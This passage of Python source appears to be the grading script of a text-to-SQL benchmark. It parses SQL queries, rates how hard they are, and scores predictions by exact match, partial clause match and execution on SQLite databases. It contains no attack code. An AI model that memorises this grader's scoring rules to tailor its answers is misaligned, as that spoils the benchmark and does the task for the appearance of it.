'join':\n idx += 1 # skip join\n idx, table_unit, table_name = parse_table_unit(toks, idx, tables_with_alias, schema)\n table_units.append((TABLE_TYPE['table_unit'],table_unit))\n default_tables.append(table_name)\n if idx < len_ and toks[idx] == \"on\":\n idx += 1 # skip on\n idx, this_conds = parse_condition(toks, idx, tables_with_alias, schema, default_tables)\n if len(conds) > 0:\n conds.append('and')\n conds.extend(this_conds)\n\n if isBlock:\n assert toks[idx] == ')'\n idx += 1\n if idx < len_ and (toks[idx] in CLAUSE_KEYWORDS or toks[idx] in (\")\", \";\")):\n break\n\n return idx, table_units, conds, default_tables\n\n\ndef parse_where(toks, start_idx, tables_with_alias, schema, default_tables):\n idx = start_idx\n len_ = len(toks)\n\n if idx >= len_ or toks[idx] != 'where':\n return idx, []\n\n idx += 1\n idx, conds = parse_condition(toks, idx, tables_with_alias, schema, default_tables)\n return idx, conds\n\n\ndef parse_group_by(toks, start_idx, tables_with_alias, schema, default_tables):\n idx = start_idx\n len_ = len(toks)\n col_units = []\n\n if idx >= len_ or toks[idx] != 'group':\n return idx, col_units\n\n idx += 1\n assert toks[idx] == 'by'\n idx += 1\n\n while idx < len_ and not (toks[idx] in CLAUSE_KEYWORDS or toks[idx] in (\")\", \";\")):\n idx, col_unit = parse_col_unit(toks, idx, tables_with_alias, schema, default_tables)\n col_units.append(col_unit)\n if idx < len_ and toks[idx] == ',':\n idx += 1 # skip ','\n else:\n break\n\n return idx, col_units\n\n\ndef parse_order_by(toks, start_idx, tables_with_alias, schema, default_tables):\n idx = start_idx\n len_ = len(toks)\n val_units = []\n order_type = 'asc' # default type is 'asc'\n\n if idx >= len_ or toks[idx] != 'order':\n return idx, val_units\n\n idx += 1\n assert toks[idx] == 'by'\n idx += 1\n\n while idx < len_ and not (toks[idx] in CLAUSE_KEYWORDS or toks[idx] in (\")\", \";\")):\n idx, val_unit = parse_val_unit(toks, idx, tables_with_alias, schema, default_tables)\n val_units.append(val_unit)\n if idx < len_ and toks[idx] in ORDER_OPS:\n order_type = toks[idx]\n idx += 1\n if idx < len_ and toks[idx] == ',':\n idx += 1 # skip ','\n else:\n break\n\n return idx, (order_type, val_units)\n\n\ndef parse_having(toks, start_idx, tables_with_alias, schema, default_tables):\n idx = start_idx\n len_ = len(toks)\n\n if idx >= len_ or toks[idx] != 'having':\n return idx, []\n\n idx += 1\n idx, conds = parse_condition(toks, idx, tables_with_alias, schema, default_tables)\n return idx, conds\n\n\ndef parse_limit(toks, start_idx):\n idx = start_idx\n len_ = len(toks)\n\n if idx < len_ and toks[idx] == 'limit':\n idx += 2\n return idx, int(toks[idx-1])\n\n return idx, None\n\n\ndef parse_sql(toks, start_idx, tables_with_alias, schema):\n isBlock = False # indicate whether this is a block of sql/sub-sql\n len_ = len(toks)\n idx = start_idx\n\n sql = {}\n if toks[idx] == '(':\n isBlock = True\n idx += 1\n\n # parse from clause in order to get default tables\n from_end_idx, table_units, conds, default_tables = parse_from(toks, start_idx, tables_with_alias, schema)\n sql['from'] = {'table_units': table_units, 'conds': conds}\n # select clause\n _, select_col_units = parse_select(toks, idx, tables_with_alias, schema, default_tables)\n idx = from_end_idx\n sql['select'] = select_col_units\n # where clause\n idx, where_conds = parse_where(toks, idx, tables_with_alias, schema, default_tables)\n sql['where'] = where_conds\n # group by clause\n idx, group_col_units = parse_group_by(toks, idx, tables_with_alias, schema, default_tables)\n sql['groupBy'] = group_col_units\n # having clause\n idx, having_conds = parse_having(toks, idx, tables_with_alias, schema, default_tables)\n sql['having'] = having_conds\n # order by clause\n idx, order_col_units = parse_order_by(toks, idx, tables_with_alias, schema, default_tables)\n sql['orderBy'] = order_col_units\n # limit clause\n idx, limit_val = parse_limit(toks, idx)\n sql['limit'] = limit_val\n\n idx = skip_semicolon(toks, idx)\n if isBlock:\n assert toks[idx] == ')'\n idx += 1 # skip ')'\n idx = skip_semicolon(toks, idx)\n\n # intersect/union/except clause\n for op in SQL_OPS: # initialize IUE\n sql[op] = None\n if idx < len_ and toks[idx] in SQL_OPS:\n sql_op = toks[idx]\n idx += 1\n idx, IUE_sql = parse_sql(toks, idx, tables_with_alias, schema)\n sql[sql_op] = IUE_sql\n return idx, sql\n\n\ndef load_data(fpath):\n with open(fpath) as f:\n data = json.load(f)\n return data\n\n\ndef get_sql(schema, query):\n toks = tokenize(query)\n tables_with_alias = get_tables_with_alias(schema.schema, toks)\n _, sql = parse_sql(toks, 0, tables_with_alias, schema)\n\n return sql\n\n\ndef skip_semicolon(toks, start_idx):\n idx = start_idx\n while idx < len(toks) and toks[idx] == \";\":\n idx += 1\n return idx\n\n\ndef condition_has_or(conds):\n return 'or' in conds[1::2]\n\n\ndef condition_has_like(conds):\n return WHERE_OPS.index('like') in [cond_unit[1] for cond_unit in conds[::2]]\n\n\ndef condition_has_sql(conds):\n for cond_unit in conds[::2]:\n val1, val2 = cond_unit[3], cond_unit[4]\n if val1 is not None and type(val1) is dict:\n return True\n if val2 is not None and type(val2) is dict:\n return True\n return False\n\n\ndef val_has_op(val_unit):\n return val_unit[0] != UNIT_OPS.index('none')\n\n\ndef has_agg(unit):\n return unit[0] != AGG_OPS.index('none')\n\n\ndef accuracy(count, total):\n if count == total:\n return 1\n return 0\n\n\ndef recall(count, total):\n if count == total:\n return 1\n return 0\n\n\ndef F1(acc, rec):\n if (acc + rec) == 0:\n return 0\n return (2. * acc * rec) / (acc + rec)\n\n\ndef get_scores(count, pred_total, label_total):\n if pred_total != label_total:\n return 0,0,0\n elif count == pred_total:\n return 1,1,1\n return 0,0,0\n\n\ndef eval_sel(pred, label):\n pred_sel = pred['select'][1]\n label_sel = label['select'][1]\n label_wo_agg = [unit[1] for unit in label_sel]\n pred_total = len(pred_sel)\n label_total = len(label_sel)\n cnt = 0\n cnt_wo_agg = 0\n\n for unit in pred_sel:\n if unit in label_sel:\n cnt += 1\n label_sel.remove(unit)\n if unit[1] in label_wo_agg:\n cnt_wo_agg += 1\n label_wo_agg.remove(unit[1])\n\n return label_total, pred_total, cnt, cnt_wo_agg\n\n\ndef eval_where(pred, label):\n pred_conds = [unit for unit in pred['where'][::2]]\n label_conds = [unit for unit in label['where'][::2]]\n label_wo_agg = [unit[2] for unit in label_conds]\n pred_total = len(pred_conds)\n label_total = len(label_conds)\n cnt = 0\n cnt_wo_agg = 0\n\n for unit in pred_conds:\n if unit in label_conds:\n cnt += 1\n label_conds.remove(unit)\n if unit[2] in label_wo_agg:\n cnt_wo_agg += 1\n label_wo_agg.remove(unit[2])\n\n return label_total, pred_total, cnt, cnt_wo_agg\n\n\ndef eval_group(pred, label):\n pred_cols = [unit[1] for unit in pred['groupBy']]\n label_cols = [unit[1] for unit in label['groupBy']]\n pred_total = len(pred_cols)\n label_total = len(label_cols)\n cnt = 0\n pred_cols = [pred.split(\".\")[1] if \".\" in pred else pred for pred in pred_cols]\n label_cols = [label.split(\".\")[1] if \".\" in label else label for label in label_cols]\n for col in pred_cols:\n if col in label_cols:\n cnt += 1\n label_cols.remove(col)\n return label_total, pred_total, cnt\n\n\ndef eval_having(pred, label):\n pred_total = label_total = cnt = 0\n if len(pred['groupBy']) > 0:\n pred_total = 1\n if len(label['groupBy']) > 0:\n label_total = 1\n\n pred_cols = [unit[1] for unit in pred['groupBy']]\n label_cols = [unit[1] for unit in label['groupBy']]\n if pred_total == label_total == 1 \\\n and pred_cols == label_cols \\\n and pred['having'] == label['having']:\n cnt = 1\n\n return label_total, pred_total, cnt\n\n\ndef eval_order(pred, label):\n pred_total = label_total = cnt = 0\n if len(pred['orderBy']) > 0:\n pred_total = 1\n if len(label['orderBy']) > 0:\n label_total = 1\n if len(label['orderBy']) > 0 and pred['orderBy'] == label['orderBy'] and \\\n ((pred['limit'] is None and label['limit'] is None) or (pred['limit'] is not None and label['limit'] is not None)):\n cnt = 1\n return label_total, pred_total, cnt\n\n\ndef eval_and_or(pred, label):\n pred_ao = pred['where'][1::2]\n label_ao = label['where'][1::2]\n pred_ao = set(pred_ao)\n label_ao = set(label_ao)\n\n if pred_ao == label_ao:\n return 1,1,1\n return len(pred_ao),len(label_ao),0\n\n\ndef get_nestedSQL(sql):\n nested = []\n for cond_unit in sql['from']['conds'][::2] + sql['where'][::2] + sql['having'][::2]:\n if type(cond_unit[3]) is dict:\n nested.append(cond_unit[3])\n if type(cond_unit[4]) is dict:\n nested.append(cond_unit[4])\n if sql['intersect'] is not None:\n nested.append(sql['intersect'])\n if sql['except'] is not None:\n nested.append(sql['except'])\n if sql['union'] is not None:\n nested.append(sql['union'])\n return nested\n\n\ndef eval_nested(pred, label):\n label_total = 0\n pred_total = 0\n cnt = 0\n if pred is not None:\n pred_total += 1\n if label is not None:\n label_total += 1\n if pred is not None and label is not None:\n cnt += Evaluator().eval_exact_match(pred, label)\n return label_total, pred_total, cnt\n\n\ndef eval_IUEN(pred, label):\n lt1, pt1, cnt1 = eval_nested(pred['intersect'], label['intersect'])\n lt2, pt2, cnt2 = eval_nested(pred['except'], label['except'])\n lt3, pt3, cnt3 = eval_nested(pred['union'], label['union'])\n label_total = lt1 + lt2 + lt3\n pred_total = pt1 + pt2 + pt3\n cnt = cnt1 + cnt2 + cnt3\n return label_total, pred_total, cnt\n\n\ndef get_keywords(sql):\n res = set()\n if len(sql['where']) > 0:\n res.add('where')\n if len(sql['groupBy']) > 0:\n res.add('group')\n if len(sql['having']) > 0:\n res.add('having')\n if len(sql['orderBy']) > 0:\n res.add(sql['orderBy'][0])\n res.add('order')\n if sql['limit'] is not None:\n res.add('limit')\n if sql['except'] is not None:\n res.add('except')\n if sql['union'] is not None:\n res.add('union')\n if sql['intersect'] is not None:\n res.add('intersect')\n\n # or keyword\n ao = sql['from']['conds'][1::2] + sql['where'][1::2] + sql['having'][1::2]\n if len([token for token in ao if token == 'or']) > 0:\n res.add('or')\n\n cond_units = sql['from']['conds'][::2] + sql['where'][::2] + sql['having'][::2]\n # not keyword\n if len([cond_unit for cond_unit in cond_units if cond_unit[0]]) > 0:\n res.add('not')\n\n # in keyword\n if len([cond_unit for cond_unit in cond_units if cond_unit[1] == WHERE_OPS.index('in')]) > 0:\n res.add('in')\n\n # like keyword\n if len([cond_unit for cond_unit in cond_units if cond_unit[1] == WHERE_OPS.index('like')]) > 0:\n res.add('like')\n\n return res\n\n\ndef eval_keywords(pred, label):\n pred_keywords = get_keywords(pred)\n label_keywords = get_keywords(label)\n pred_total = len(pred_keywords)\n label_total = len(label_keywords)\n cnt = 0\n\n for k in pred_keywords:\n if k in label_keywords:\n cnt += 1\n return label_total, pred_total, cnt\n\n\ndef count_agg(units):\n return len([unit for unit in units if has_agg(unit)])\n\n\ndef count_component1(sql):\n count = 0\n if len(sql['where']) > 0:\n count += 1\n if len(sql['groupBy']) > 0:\n count += 1\n if len(sql['orderBy']) > 0:\n count += 1\n if sql['limit'] is not None:\n count += 1\n if len(sql['from']['table_units']) > 0: # JOIN\n count += len(sql['from']['table_units']) - 1\n\n ao = sql['from']['conds'][1::2] + sql['where'][1::2] + sql['having'][1::2]\n count += len([token for token in ao if token == 'or'])\n cond_units = sql['from']['conds'][::2] + sql['where'][::2] + sql['having'][::2]\n count += len([cond_unit for cond_unit in cond_units if cond_unit[1] == WHERE_OPS.index('like')])\n\n return count\n\n\ndef count_component2(sql):\n nested = get_nestedSQL(sql)\n return len(nested)\n\n\ndef count_others(sql):\n count = 0\n # number of aggregation\n agg_count = count_agg(sql['select'][1])\n agg_count += count_agg(sql['where'][::2])\n agg_count += count_agg(sql['groupBy'])\n if len(sql['orderBy']) > 0:\n agg_count += count_agg([unit[1] for unit in sql['orderBy'][1] if unit[1]] +\n [unit[2] for unit in sql['orderBy'][1] if unit[2]])\n agg_count += count_agg(sql['having'])\n if agg_count > 1:\n count += 1\n\n # number of select columns\n if len(sql['select'][1]) > 1:\n count += 1\n\n # number of where conditions\n if len(sql['where']) > 1:\n count += 1\n\n # number of group by clauses\n if len(sql['groupBy']) > 1:\n count += 1\n\n return count\n\n\nclass Evaluator:\n \"\"\"A simple evaluator\"\"\"\n def __init__(self):\n self.partial_scores = None\n\n def eval_hardness(self, sql):\n count_comp1_ = count_component1(sql)\n count_comp2_ = count_component2(sql)\n count_others_ = count_others(sql)\n\n if count_comp1_ <= 1 and count_others_ == 0 and count_comp2_ == 0:\n return \"easy\"\n elif (count_others_ <= 2 and count_comp1_ <= 1 and count_comp2_ == 0) or \\\n (count_comp1_ <= 2 and count_others_ < 2 and count_comp2_ == 0):\n return \"medium\"\n elif (count_others_ > 2 and count_comp1_ <= 2 and count_comp2_ == 0) or \\\n (2 < count_comp1_ <= 3 and count_others_ <= 2 and count_comp2_ == 0) or \\\n (count_comp1_ <= 1 and count_others_ == 0 and count_comp2_ <= 1):\n return \"hard\"\n else:\n return \"extra\"\n\n def eval_exact_match(self, pred, label):\n partial_scores = self.eval_partial_match(pred, label)\n self.partial_scores = partial_scores\n\n for _, score in partial_scores.items():\n if score['f1'] != 1:\n return 0\n if len(label['from']['table_units']) > 0:\n label_tables = sorted(label['from']['table_units'])\n pred_tables = sorted(pred['from']['table_units'])\n return label_tables == pred_tables\n return 1\n\n def eval_partial_match(self, pred, label):\n res = {}\n\n label_total, pred_total, cnt, cnt_wo_agg = eval_sel(pred, label)\n acc, rec, f1 = get_scores(cnt, pred_total, label_total)\n res['select'] = {'acc': acc, 'rec': rec, 'f1': f1,'label_total':label_total,'pred_total':pred_total}\n acc, rec, f1 = get_scores(cnt_wo_agg, pred_total, label_total)\n res['select(no AGG)'] = {'acc': acc, 'rec': rec, 'f1': f1,'label_total':label_total,'pred_total':pred_total}\n\n label_total, pred_total, cnt, cnt_wo_agg = eval_where(pred, label)\n acc, rec, f1 = get_scores(cnt, pred_total, label_total)\n res['where'] = {'acc': acc, 'rec': rec, 'f1': f1,'label_total':label_total,'pred_total':pred_total}\n acc, rec, f1 = get_scores(cnt_wo_agg, pred_total, label_total)\n res['where(no OP)'] = {'acc': acc, 'rec': rec, 'f1': f1,'label_total':label_total,'pred_total':pred_total}\n\n label_total, pred_total, cnt = eval_group(pred, label)\n acc, rec, f1 = get_scores(cnt, pred_total, label_total)\n res['group(no Having)'] = {'acc': acc, 'rec': rec, 'f1': f1,'label_total':label_total,'pred_total':pred_total}\n\n label_total, pred_total, cnt = eval_having(pred, label)\n acc, rec, f1 = get_scores(cnt, pred_total, label_total)\n res['group'] = {'acc': acc, 'rec': rec, 'f1': f1,'label_total':label_total,'pred_total':pred_total}\n\n label_total, pred_total, cnt = eval_order(pred, label)\n acc, rec, f1 = get_scores(cnt, pred_total, label_total)\n res['order'] = {'acc': acc, 'rec': rec, 'f1': f1,'label_total':label_total,'pred_total':pred_total}\n\n label_total, pred_total, cnt = eval_and_or(pred, label)\n acc, rec, f1 = get_scores(cnt, pred_total, label_total)\n res['and/or'] = {'acc': acc, 'rec': rec, 'f1': f1,'label_total':label_total,'pred_total':pred_total}\n\n label_total, pred_total, cnt = eval_IUEN(pred, label)\n acc, rec, f1 = get_scores(cnt, pred_total, label_total)\n res['IUEN'] = {'acc': acc, 'rec': rec, 'f1': f1,'label_total':label_total,'pred_total':pred_total}\n\n label_total, pred_total, cnt = eval_keywords(pred, label)\n acc, rec, f1 = get_scores(cnt, pred_total, label_total)\n res['keywords'] = {'acc': acc, 'rec': rec, 'f1': f1,'label_total':label_total,'pred_total':pred_total}\n\n return res\n\n\ndef isValidSQL(sql, db):\n conn = sqlite3.connect(db)\n cursor = conn.cursor()\n try:\n cursor.execute(sql)\n except:\n return False\n return True\n\n\ndef print_scores(scores, etype):\n levels = ['easy', 'medium', 'hard', 'extra', 'all']\n partial_types = ['select', 'select(no AGG)', 'where', 'where(no OP)', 'group(no Having)',\n 'group', 'order', 'and/or', 'IUEN', 'keywords']\n\n print(\"{:20} {:20} {:20} {:20} {:20} {:20}\".format(\"\", *levels))\n counts = [scores[level]['count'] for level in levels]\n print(\"{:20} {:<20d} {:<20d} {:<20d} {:<20d} {:<20d}\".format(\"count\", *counts))\n\n if etype in [\"all\", \"exec\"]:\n print('===================== EXECUTION ACCURACY =====================')\n this_scores = [scores[level]['exec'] for level in levels]\n print(\"{:20} {:<20.3f} {:<20.3f} {:<20.3f} {:<20.3f} {:<20.3f}\".format(\"execution\", *this_scores))\n\n if etype in [\"all\", \"match\"]:\n print('\\n====================== EXACT MATCHING ACCURACY =====================')\n exact_scores = [scores[level]['exact'] for level in levels]\n print(\"{:20} {:<20.3f} {:<20.3f} {:<20.3f} {:<20.3f} {:<20.3f}\".format(\"exact match\", *exact_scores))\n print('\\n---------------------PARTIAL MATCHING ACCURACY----------------------')\n for type_ in partial_types:\n this_scores = [scores[level]['partial'][type_]['acc'] for level in levels]\n print(\"{:20} {:<20.3f} {:<20.3f} {:<20.3f} {:<20.3f} {:<20.3f}\".format(type_, *this_scores))\n\n print('---------------------- PARTIAL MATCHING RECALL ----------------------')\n for type_ in partial_types:\n this_scores = [scores[level]['partial'][type_]['rec'] for level in levels]\n print(\"{:20} {:<20.3f} {:<20.3f} {:<20.3f} {:<20.3f} {:<20.3f}\".format(type_, *this_scores))\n\n print('---------------------- PARTIAL MATCHING F1 --------------------------')\n for type_ in partial_types:\n this_scores = [scores[level]['partial'][type_]['f1'] for level in levels]\n print(\"{:20} {:<20.3f} {:<20.3f} {:<20.3f} {:<20.3f} {:<20.3f}\".format(type_, *this_scores))\n\n\ndef evaluate(gold, predict, db_dir, etype, kmaps, infer_list):\n with open(gold) as f:\n glist = [l.strip().split('\\t') for l in f.readlines() if len(l.strip()) > 0]\n # print('gold',len(glist))\n # with open(predict) as f:\n plist = predict.copy()\n\n # plist = [(\"select max(Share),min(Share) from performance where Type != 'terminal'\", \"orchestra\")]\n # glist = [(\"SELECT max(SHARE) , min(SHARE) FROM performance WHERE TYPE != 'Live final'\", \"orchestra\")]\n # print('predict',len(plist))\n evaluator = Evaluator()\n\n levels = ['easy', 'medium', 'hard', 'extra', 'all']\n partial_types = ['select', 'select(no AGG)', 'where', 'where(no OP)', 'group(no Having)',\n 'group', 'order', 'and/or', 'IUEN', 'keywords']\n entries = []\n scores = {}\n result_entries = []\n\n for level in levels:\n scores[level] = {'count': 0, 'partial': {}, 'exact': 0.}\n scores[level]['exec'] = 0\n for type_ in partial_types:\n scores[level]['partial'][type_] = {'acc': 0., 'rec': 0., 'f1': 0.,'acc_count':0,'rec_count':0}\n\n eval_err_num = 0\n i=0\n for p, g in zip(plist, glist):\n p_str = p\n g_str, db = g\n db_name = db\n db = os.path.join(db_dir, db, db + \".sqlite\")\n schema = Schema(get_schema(db))\n\n g_sql = get_sql(schema, g_str)\n # print('gold',g_sql)\n hardness = evaluator.eval_hardness(g_sql)\n scores[hardness]['count'] += 1\n scores['all']['count'] += 1\n try:\n p_sql = get_sql(schema, p_str)\n # print('predicted',p_sql)\n except:\n p_sql = {\"except\":None,\n \"from\": {\n \"conds\": [],\n \"table_units\": []\n },\n \"groupBy\": [],\n \"having\": [],\n \"intersect\": None,\n \"limit\": None,\n \"orderBy\": [],\n \"select\": [\n False,\n []\n ],\n \"union\": None,\n \"where\": []\n }\n eval_err_num += 1\n # print(\"eval_err_num:{}\".format(eval_err_num))\n\n # rebuild sql for value evaluation\n kmap = kmaps[db_name]\n g_valid_col_units = build_valid_col_units(g_sql['from']['table_units'], schema)\n # print(g_sql)\n g_sql = rebuild_sql_val(g_sql)\n # print(g_sql)\n g_sql = rebuild_sql_col(g_valid_col_units, g_sql, kmap)\n # print(g_sql)\n p_valid_col_units = build_valid_col_units(p_sql['from']['table_units'], schema)\n import copy\n p_sql = rebuild_sql_val(p_sql)\n # print('pred',p_sql)\n p_sql = rebuild_sql_col(p_valid_col_units, p_sql, kmap)\n # print('pred',p_sql)\n p_sql_new = copy.deepcopy(p_sql)\n g_sql_new = copy.deepcopy(g_sql)\n\n if etype in [\"all\", \"exec\"]:\n exec_score = eval_exec_match(db, p_str, g_str, p_sql, g_sql)\n # print(p_sql,g_sql)\n if exec_score:\n scores[hardness]['exec'] += 1.0\n scores['all']['exec'] += 1.0\n # result_entries.append({\n # 'db_id': db,\n # 'nl_qn': infer_list[i],\n # 'predictSQL': p_str,\n # 'goldSQL': g_str,\n # 'hardness': hardness,\n # 'exact': exact_score,\n # 'partial': partial_scores,\n # 'gold_sql':g_sql_new,\n # 'predicted_sql':p_sql_new,\n # 'execution':exec_score\n # })\n\n if etype in [\"all\", \"match\"]:\n exact_score = evaluator.eval_exact_match(p_sql, g_sql)\n # print(p_sql,g_sql)\n partial_scores = evaluator.partial_scores\n # print(p_sql,g_sql)\n # if exact_score == 0:\n # # print(\"{} pred: {}\".format(hardness,p_str))\n # # print(\"{} gold: {}\".format(hardness,g_str))\n # print(\"\")\n scores[hardness]['exact'] += exact_score\n scores['all']['exact'] += exact_score\n for type_ in partial_types:\n if partial_scores[type_]['pred_total'] > 0:\n scores[hardness]['partial'][type_]['acc'] += partial_scores[type_]['acc']\n scores[hardness]['partial'][type_]['acc_count'] += 1\n if partial_scores[type_]['label_total'] > 0:\n scores[hardness]['partial'][type_]['rec'] += partial_scores[type_]['rec']\n scores[hardness]['partial'][type_]['rec_count'] += 1\n scores[hardness]['partial'][type_]['f1'] += partial_scores[type_]['f1']\n if partial_scores[type_]['pred_total'] > 0:\n scores['all']['partial'][type_]['acc'] += partial_scores[type_]['acc']\n scores['all']['partial'][type_]['acc_count'] += 1\n if partial_scores[type_]['label_total'] > 0:\n scores['all']['partial'][type_]['rec'] += partial_scores[type_]['rec']\n scores['all']['partial'][type_]['rec_count'] += 1\n scores['all']['partial'][type_]['f1'] += partial_scores[type_]['f1']\n\n # entries.append({\n # 'predictSQL': p_str,\n # 'goldSQL': g_str,\n # 'hardness': hardness,\n # 'exact': exact_score,\n # 'partial': partial_scores\n # })\n result_entries.append({\n 'db_id': db_name,\n 'nl_qn': infer_list[i],\n 'predictSQL': p_str,\n 'goldSQL': g_str,\n 'hardness': hardness,\n 'exact': exact_score,\n 'partial': partial_scores,\n 'gold_sql':g_sql_new,\n 'predicted_sql':p_sql_new,\n 'execution':exec_score\n })\n i+=1\n\n # for level in levels:\n # if scores[level]['count'] == 0:\n # continue\n # if etype in [\"all\", \"exec\"]:\n # scores[level]['exec'] /= scores[level]['count']\n\n # if etype in [\"all\", \"match\"]:\n # scores[level]['exact'] /= scores[level]['count']\n # for type_ in partial_types:\n # if scores[level]['partial'][type_]['acc_count'] == 0:\n # scores[level]['partial'][type_]['acc'] = 0\n # else:\n # scores[level]['partial'][type_]['acc'] = scores[level]['partial'][type_]['acc'] / \\\n # scores[level]['partial'][type_]['acc_count'] * 1.0\n # if scores[level]['partial'][type_]['rec_count'] == 0:\n # scores[level]['partial'][type_]['rec'] = 0\n # else:\n # scores[level]['partial'][type_]['rec'] = scores[level]['partial'][type_]['rec'] / \\\n # scores[level]['partial'][type_]['rec_count'] * 1.0\n # if scores[level]['partial'][type_]['acc'] == 0 and scores[level]['partial'][type_]['rec'] == 0:\n # scores[level]['partial'][type_]['f1'] = 1\n # else:\n # scores[level]['partial'][type_]['f1'] = \\\n # 2.0 * scores[level]['partial'][type_]['acc'] * scores[level]['partial'][type_]['rec'] / (\n # scores[level]['partial'][type_]['rec'] + scores[level]['partial'][type_]['acc'])\n # print(scores)\n #print_scores(scores, etype)\n return result_entries\n\n\ndef eval_exec_match(db, p_str, g_str, pred, gold):\n \"\"\"\n return 1 if the values between prediction and gold are matching\n in the corresponding index. Currently not support multiple col_unit(pairs).\n \"\"\"\n conn = sqlite3.connect(db)\n cursor = conn.cursor()\n try:\n cursor.execute(p_str)\n p_res = cursor.fetchall()\n except:\n return False\n\n cursor.execute(g_str)\n q_res = cursor.fetchall()\n\n def res_map(res, val_units):\n rmap = {}\n for idx, val_unit in enumerate(val_units):\n key = tuple(val_unit[1]) if not val_unit[2] else (val_unit[0], tuple(val_unit[1]), tuple(val_unit[2]))\n rmap[key] = [r[idx] for r in res]\n return rmap\n\n p_val_units = [unit[1] for unit in pred['select'][1]]\n q_val_units = [unit[1] for unit in gold['select'][1]]\n return res_map(p_res, p_val_units) == res_map(q_res, q_val_units)\n\n\n# Rebuild SQL functions for value evaluation\ndef rebuild_cond_unit_val(cond_unit):\n if cond_unit is None or not DISABLE_VALUE:\n return cond_unit\n\n not_op, op_id, val_unit, val1, val2 = cond_unit\n if type(val1) is not dict:\n val1 = None\n else:\n val1 = rebuild_sql_val(val1)\n if type(val2) is not dict:\n val2 = None\n else:\n val2 = rebuild_sql_val(val2)\n return not_op, op_id, val_unit, val1, val2\n\n\ndef rebuild_condition_val(condition):\n if condition is None or not DISABLE_VALUE:\n return condition\n\n res = []\n for idx, it in enumerate(condition):\n if idx % 2 == 0:\n res.append(rebuild_cond_unit_val(it))\n else:\n res.append(it)\n return res\n\n\ndef rebuild_sql_val(sql):\n if sql is None or not DISABLE_VALUE:\n return sql\n\n sql['from']['conds'] = rebuild_condition_val(sql['from']['conds'])\n sql['having'] = rebuild_condition_val(sql['having'])\n sql['where'] = rebuild_condition_val(sql['where'])\n sql['intersect'] = rebuild_sql_val(sql['intersect'])\n sql['except'] = rebuild_sql_val(sql['except'])\n sql['union'] = rebuild_sql_val(sql['union'])\n\n return sql\n\n\n# Rebuild SQL functions for foreign key evaluation\ndef build_valid_col_units(table_units, schema):\n col_ids = [table_unit[1] for table_unit in table_units if table_unit[0] == TABLE_TYPE['table_unit']]\n prefixs = [col_id[:-2] for col_id in col_ids]\n valid_col_units= []\n for value in schema.idMap.values():\n if '.' in value and value[:value.index('.')] in prefixs:\n valid_col_units.append(value)\n return valid_col_units\n\n\ndef rebuild_col_unit_col(valid_col_units, col_unit, kmap):\n if col_unit is None:\n return col_unit\n\n agg_id, col_id, distinct = col_unit\n if col_id in kmap and col_id in valid_col_units:\n col_id = kmap[col_id]\n if DISABLE_DISTINCT:\n distinct = None\n return agg_id, col_id, distinct\n\n\ndef rebuild_val_unit_col(valid_col_units, val_unit, kmap):\n if val_unit is None:\n return val_unit\n\n unit_op, col_unit1, col_unit2 = val_unit\n col_unit1 = rebuild_col_unit_col(valid_col_units, col_unit1, kmap)\n col_unit2 = rebuild_col_unit_col(valid_col_units, col_unit2, kmap)\n return unit_op, col_unit1, col_unit2\n\n\ndef rebuild_table_unit_col(valid_col_units, table_unit, kmap):\n if table_unit is None:\n return table_unit\n\n table_type, col_unit_or_sql = table_unit\n if isinstance(col_unit_or_sql, tuple):\n col_unit_or_sql = rebuild_col_unit_col(valid_col_units, col_unit_or_sql, kmap)\n return table_type, col_unit_or_sql\n\n\ndef rebuild_cond_unit_col(valid_col_units, cond_unit, kmap):\n if cond_unit is None:\n return cond_unit\n\n not_op, op_id, val_unit, val1, val2 = cond_unit\n val_unit = rebuild_val_unit_col(valid_col_units, val_unit, kmap)\n return not_op, op_id, val_unit, val1, val2\n\n\ndef rebuild_condition_col(valid_col_units, condition, kmap):\n for idx in range(len(condition)):\n if idx % 2 == 0:\n condition[idx] = rebuild_cond_unit_col(valid_col_units, condition[idx], kmap)\n return condition\n\n\ndef rebuild_select_col(valid_col_units, sel, kmap):\n if sel is None:\n return sel\n distinct, _list = sel\n new_list = []\n for it in _list:\n agg_id, val_unit = it\n new_list.append((agg_id, rebuild_val_unit_col(valid_col_units, val_unit, kmap)))\n if DISABLE_DISTINCT:\n distinct = None\n return distinct, new_list\n\n\ndef rebuild_from_col(valid_col_units, from_, kmap):\n if from_ is None:\n return from_\n\n from_['table_units'] = [rebuild_table_unit_col(valid_col_units, table_unit, kmap) for table_unit in from_['table_units']]\n from_['conds'] = rebuild_condition_col(valid_col_units, from_['conds'], kmap)\n return from_\n\n\ndef rebuild_group_by_col(valid_col_units, group_by, kmap):\n if group_by is None:\n return group_by\n\n return [rebuild_col_unit_col(valid_col_units, col_unit, kmap) for col_unit in group_by]\n\n\ndef rebuild_order_by_col(valid_col_units, order_by, kmap):\n if order_by is None or len(order_by) == 0:\n return order_by\n\n direction, val_units = order_by\n new_val_units = [rebuild_val_unit_col(valid_col_units, val_unit, kmap) for val_unit in val_units]\n return direction, new_val_units\n\n\ndef rebuild_sql_col(valid_col_units, sql, kmap):\n if sql is None:\n return sql\n\n sql['select'] = rebuild_select_col(valid_col_units, sql['select'], kmap)\n sql['from'] = rebuild_from_col(valid_col_units, sql['from'], kmap)\n sql['where'] = rebuild_condition_col(valid_col_units, sql['where'], kmap)\n sql['groupBy'] = rebuild_group_by_col(valid_col_units, sql['groupBy'], kmap)\n sql['orderBy'] = rebuild_order_by_col(valid_col_units, sql['orderBy'], kmap)\n sql['having'] = rebuild_condition_col(valid_col_units, sql['having'], kmap)\n sql['intersect'] = rebuild_sql_col(valid_col_units, sql['intersect'], kmap)\n sql['except'] = rebuild_sql_col(valid_col_units, sql['except'], kmap)\n sql['union'] = rebuild_sql_col(valid_col_units, sql['union'], kmap)\n\n return sql\n\n\ndef build_foreign_key_map(entry):\n cols_orig = entry[\"column_names_original\"]\n tables_orig = entry[\"table_names_original\"]\n\n # rebuild cols corresponding to idmap in Schema\n cols = []\n for col_orig in cols_orig:\n if col_orig[0] >= 0:\n t = tables_orig[col_orig[0]]\n c = col_orig[1]\n cols.append(\"__\" + t.lower() + \".\" + c.lower() + \"__\")\n else:\n cols.append(\"__all__\")\n\n def keyset_in_list(k1, k2, k_list):\n for k_set in k_list:\n if k1 in k_set or k2 in k_set:\n return k_set\n new_k_set = set()\n k_list.append(new_k_set)\n return new_k_set\n\n foreign_key_list = []\n foreign_keys = entry[\"foreign_keys\"]\n for fkey in foreign_keys:\n key1, key2 = fkey\n key_set = keyset_in_list(key1, key2, foreign_key_list)\n key_set.add(key1)\n key_set.add(key2)\n\n foreign_key_map = {}\n for key_set in foreign_key_list:\n sorted_list = sorted(list(key_set))\n midx = 